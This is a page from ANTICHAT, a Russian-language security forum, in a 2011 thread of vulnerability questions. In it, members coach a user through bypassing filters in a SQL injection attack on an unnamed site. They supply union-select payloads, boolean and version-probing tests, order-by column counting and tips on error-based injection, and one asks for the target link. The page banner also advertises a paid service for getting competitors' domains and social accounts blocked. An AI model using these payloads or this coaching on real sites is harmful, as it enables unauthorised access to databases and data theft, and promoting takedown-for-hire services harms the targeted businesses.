УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1609 из 2438

1609

Опции темы

Поиск в этой теме

Опции просмотра

#16081

10.01.2011, 04:33

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

Цитата:

Сообщение от iget

iget said:
Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.

GetEngine.pl - скрипт для определения имени\версии движка

ТиЦ

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

#16082

11.01.2011, 11:04

Unknown

Guest

Сообщений: n/a

Провел на форуме:
191387

Репутация: 6

подскажите как обойти фильтрацию минуса

делаю

Цитата:

Сообщение от None

id=1+union+select+version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion()+--+

поля версии не видно

делаю

Цитата:

Сообщение от None

id=-1

перенаправляет на главную страницу

#16083

11.01.2011, 11:20

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от noviyuser

noviyuser said:
подскажите как обойти фильтрацию минуса
делаю
поля версии не видно
делаю
перенаправляет на главную страницу

limit+1,1

#16084

11.01.2011, 11:22

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

noviyuser

зафелси запрос более мягко,

and+1!=1

and+1>2

and+verson()=user()

и тп.

если видны ошибки мускула, попробуй эррор бейсд.

#16085

11.01.2011, 11:31

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от noviyuser

ну по всей же видимости

Код:

Code:
id=1+and+1=0+union+select+version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version()+--+

да и потом, бывают случаи, когда при не совпадении типа выводимых данных срабатывает редирект, по этому конструкция что в твоем запросе (вывод кучи функций version()) не самый верный.

#16086

11.01.2011, 11:32

Unknown

Guest

Сообщений: n/a

Провел на форуме:
191387

Репутация: 6

точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()

ни один из способов не помог

вроде не слепая пробовал

and+substring(@@version,1,1)=4

and+substring(@@version,1,1)=5

пробовал и так и так

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9+--+

id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+--+

если ставлю кавычку или минус перенаправляет

#16087

11.01.2011, 11:33

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

link pls

#16088

11.01.2011, 12:02

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от noviyuser

noviyuser said:
точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()
ни один из способов не помог
вроде не слепая пробовал
and+substring(@@version,1,1)=4
and+substring(@@version,1,1)=5
пробовал и так и так
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9+--+
id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+--+
если ставлю кавычку или минус перенаправляет

а как ты пришел к выводу, что там 19 полей?

#16089

11.01.2011, 12:16

Unknown

Guest

Сообщений: n/a

Провел на форуме:
191387

Репутация: 6

Цитата:

Сообщение от Expl0ited

Expl0ited said:
а как ты пришел к выводу, что там 19 полей?

order+by+19

на таком перенаправляет

order+by+20

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,20

тоже перенаправляет

null тоже не помогает

#16090

11.01.2011, 12:24

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от noviyuser

noviyuser said:
order+by+19
на таком перенаправляет
order+by+20
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,20
тоже перенаправляет

замени цифры на null

[upd] тогда кидай линк.

Страница 1609 из 2438

1609

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход